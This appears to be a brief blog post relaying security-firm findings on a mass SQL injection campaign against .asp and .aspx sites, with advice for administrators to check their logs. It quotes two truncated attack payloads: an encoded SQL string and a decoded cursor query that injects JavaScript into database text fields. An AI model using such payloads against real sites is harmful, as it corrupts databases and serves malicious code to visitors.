According to an analysis by Websense, the malware tries to exploit a total of eight security holes to pass malicious code to the visitors of the pages unnoticed, for example via the VML hole already patched in January 2007. F-Secure has monitored attackers who tried to break into .asp and .aspx web pages by submitting the page parameters in an encrypted SQL query:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004[...]
Once decrypted, this is an SQL query designed to find all the text fields in the database behind the web page and inject JavaScript code into them:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b[...]
Both code snippets are only the beginning of the request. Administrators of servers delivering .asp or .aspx pages (like Microsoft's IIS) are advised to check their log files for similar entries and if necessary search their databases for injected links.
Ah, the ingenuity of mankind. It is impressive isn't it?
No comments:
Post a Comment